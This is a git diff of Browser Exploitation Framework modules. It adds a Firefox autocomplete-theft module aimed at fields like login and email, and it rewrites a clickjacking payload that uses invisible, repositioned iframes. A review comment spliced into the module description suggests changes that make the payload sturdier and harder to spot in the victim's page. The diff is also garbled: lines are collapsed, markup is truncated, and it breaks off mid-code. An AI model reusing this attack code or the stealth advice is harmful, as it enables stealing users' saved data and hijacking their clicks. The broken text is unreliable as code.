+ enable: true
+ category: "Social Engineering"
+ name: "Steal Autocomplete"
+ description: "This module steals autocomplete values from Firefox. The user must press the up or down arrow keys twice, followed by the left or right arrow key, in order to steal autocomplete information.
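Review bot: `input.setAttribute("name", "<%= @input_name %>");` drops the operator-chosen field name straight into a JS string literal with no escaping, and since the module.rb option is a combobox it looks like free text is accepted, so a value containing `"` or `\` breaks the whole payload in the hooked browser with no feedback to the operator; emit it as a JSON literal instead, `input.setAttribute("name", <%= @input_name.to_json %>);` (assuming `json` is loaded where command.js is rendered, which the hunk does not show). The payload also relies on implicit globals (`steal_autocomplete`, `get_autocomplete`, `inArray`, `steal`, `tt`, `input`) forced by the string-argument `setTimeout("steal_autocomplete();", 100);`, which leaks those names into the page's `window`, risks collisions with page globals and makes the hook easier to spot; declaring them with `var` inside the `beef.execute` closure and calling `setTimeout(steal_autocomplete, 100);` keeps the same behaviour. Finally, the `onblur` handler calls `document.body.removeChild(this)` and then schedules `o.focus()` on the now-detached element, so as written the module appears to capture a single value per execution; if that is intended, a comment saying so would save the next reader the puzzle, otherwise the input should be re-appended before re-focusing.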
Hint: Try convincing the user to enter the Konami code (Up, Up, Down, Down, Left, Right, Left, Right, B, A, Enter)."
+ authors: ["Stefano Di Paola", "bcoles"]
+ target:
+ working: ["FF"]
+ not_working: ["ALL"]
diff --git a/modules/social_engineering/autocomplete_theft/module.rb b/modules/social_engineering/autocomplete_theft/module.rb
new file mode 100644
index 000000000..45ab2f35d
--- /dev/null
+++ b/modules/social_engineering/autocomplete_theft/module.rb
@@ -0,0 +1,49 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# Based on the PoC by Stefano Di Paola
+# Ported to BeEF by bcoles
+# For more information see: http://blog.mindedsecurity.com/2011/10/autocompleteagain.html
+################################################################################
+class Steal_autocomplete < BeEF::Core::Command
+
+ def self.options
+ return [
+ { 'name' => 'input_name',
+ 'type' => 'combobox',
+ 'ui_label' => 'Input Field Name',
+ 'store_type' => 'arraystore',
+ 'store_fields' => ['element_name'],
+ 'store_data' => [
+ ['login'],
+ ['email'],
+ ['Email'],
+ ['session[username_or_email]'],
+ ['q'],
+ ['search'],
+ ['name'],
+ ['company'],
+ ['city'],
+ ['state'],
+ ['country'],
+ ],
+ 'emptyText' => 'Select an input field name to steal autocomplete values',
+ 'valueField' => 'element_name',
+ 'displayField' => 'element_name',
+ 'mode' => 'local',
+ 'autoWidth' => true
+ }
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['results'] = @datastore['results']
+ save content
+ end
+
+end
+
diff --git a/modules/social_engineering/clickjacking/command.js b/modules/social_engineering/clickjacking/command.js
index 70985c019..8dfe3a35f 100644
--- a/modules/social_engineering/clickjacking/command.js
+++ b/modules/social_engineering/clickjacking/command.js
@@ -1,92 +1,139 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// +/* + * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + beef.execute(function() { - - var offset_top = "<%= @offset_top %>"; - var offset_left = "<%= @offset_left %>"; - var url = "<%= @url %>"; - var debug = <%= @debug %>; - - if (debug) opacity = 10; else opacity = 0; - - // create container - var cjcontainer = document.createElement('div'); - cjcontainer.id = "cjcontainer"; - cjcontainer.setAttribute("style", "-moz-opacity:"+opacity); - cjcontainer.style.zIndex = 999; - cjcontainer.style.border = "none"; - cjcontainer.style.width = "30px"; - cjcontainer.style.height = "20px"; - cjcontainer.style.overflow = "hidden"; - cjcontainer.style.position = "absolute"; - cjcontainer.style.opacity = opacity; - cjcontainer.style.filter = "alpha(opacity="+opacity+")"; - cjcontainer.style.cursor = "default"; - document.body.appendChild(cjcontainer); - - // create iframe - var cjiframe = document.createElement('iframe'); - cjiframe.id = "cjiframe"; - cjiframe.src = url; - cjiframe.scrolling = "no"; - cjiframe.frameBorder = "0"; - cjiframe.allowTransparency = "true"; - cjiframe.style.overflow = "hidden"; - cjiframe.style.position = "absolute"; - cjiframe.style.top = offset_top+"px"; - cjiframe.style.left = 
offset_left+"px"; - cjiframe.style.width = "200px"; - cjiframe.style.height = "100px"; - cjiframe.style.border = "none"; - cjiframe.style.cursor = "default"; - cjcontainer.appendChild(cjiframe); - - // followmouse code by rsnake - // http://ha.ckers.org/weird/followmouse.html - // modified by bcoles - function followmouse(e){ - - var xcoord = 0; - var ycoord = 0; - var gettrailobj = function() { - if (document.getElementById) - return document.getElementById("cjcontainer").style; - else if (document.all) - return document.all.container.style; - } - if (typeof e != "undefined") { - xcoord += e.pageX - 10; - ycoord += e.pageY - 15; - } else if (typeof window.event != "undefined") { - xcoord += document.body.scrollLeft + event.clientX; - ycoord += document.body.scrollTop + event.clientY; - } - var docwidth = document.all ? document.body.scrollLeft + document.body.clientWidth : pageXOffset+window.innerWidth - 15; - var docheight = document.all ? Math.max(document.body.scrollHeight, document.body.clientHeight) : Math.max(document.body.offsetHeight, window.innerHeight) - gettrailobj().left = xcoord + "px"; - gettrailobj().top = ycoord + "px"; + var elems = { + outerFrame: "cjFrame", + innerFrame: "innerFrame", + btn: "persistentFocusBtn" } - // hook to mousemove event - if (window.addEventListener) { - window.addEventListener('mousemove', followmouse, false); - } else if (window.attachEvent) { - window.attachEvent('mousemove', followmouse); + var clicked = 0; + var src = "<%= @iFrameSrc %>"; + var secZone = "<%= @iFrameSecurityZone %>"; + var sandbox = "<%= @iFrameSandbox %>"; + var visibility = "<%= @iFrameVisibility %>"; + + var clicks = [ + {js:"<%= URI.escape(@clickaction_1) %>", posTop:cleanPos("<%= @iFrameTop_1 %>"), posLeft:cleanPos("<%= @iFrameLeft_1 %>")}, + {js:"<%= URI.escape(@clickaction_2) %>", posTop:cleanPos("<%= @iFrameTop_2 %>"), posLeft:cleanPos("<%= @iFrameLeft_2 %>")}, + {js:"<%= URI.escape(@clickaction_3) %>", posTop:cleanPos("<%= @iFrameTop_3 %>"), 
posLeft:cleanPos("<%= @iFrameLeft_3 %>")}, + {js:"<%= URI.escape(@clickaction_4) %>", posTop:cleanPos("<%= @iFrameTop_4 %>"), posLeft:cleanPos("<%= @iFrameLeft_4 %>")}, + {js:"<%= URI.escape(@clickaction_5) %>", posTop:cleanPos("<%= @iFrameTop_5 %>"), posLeft:cleanPos("<%= @iFrameLeft_5 %>")}, + {js:"<%= URI.escape(@clickaction_6) %>", posTop:cleanPos("<%= @iFrameTop_6 %>"), posLeft:cleanPos("<%= @iFrameLeft_6 %>")}, + {js:"<%= URI.escape(@clickaction_7) %>", posTop:cleanPos("<%= @iFrameTop_7 %>"), posLeft:cleanPos("<%= @iFrameLeft_7 %>")}, + {js:"<%= URI.escape(@clickaction_8) %>", posTop:cleanPos("<%= @iFrameTop_8 %>"), posLeft:cleanPos("<%= @iFrameLeft_8 %>")}, + {js:"void(0);", posTop:'-', posLeft:'-'} + ] + + var iframeAttrs = {}; + iframeAttrs.src = src; + (secZone == "on") ? iframeAttrs.security = "restricted" : ""; + (sandbox == "on") ? iframeAttrs.sandbox = "allow-forms" : ""; + + var iframeStyles = {}; + iframeStyles.width = "<%= @iFrameWidth %>px"; + iframeStyles.height = "<%= @iFrameHeight %>px"; + iframeStyles.opacity = (visibility == "on") ? "0.6" : "0.0"; + iframeStyles.filter = (visibility == "on") ? 
"alpha(opacity=60)" : "alpha(opacity=0)"; + + var innerPos = {}; + //initialize iframe + innerPos.top = clicks[0].posTop + "px"; + innerPos.left = clicks[0].posLeft + "px"; + + //returns a negative version of a number, or if NaN returns a dash + function cleanPos(coordinate) { + var iCoordinate = parseInt(coordinate); + if (isNaN(iCoordinate)) + return "-"; + else if (iCoordinate > 0) + return (-1 * iCoordinate) + return iCoordinate } - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'clickjack=hooked mousemove event'); + function init(params, styles, stylesInner, callback) { + var container = $j.extend(true, {'border':'none', 'position':'absolute', 'z-index':'100000', 'overflow':'hidden'}, styles); + var inner = $j.extend(true, {'border':'none', 'position':'absolute', 'width':'2000px', 'height':'10000px'}, stylesInner); + var containerDiv = $j('
').css(container).prependTo('body'); + var containerDiv = $j('').appendTo('body'); + + var innerIframe = $j('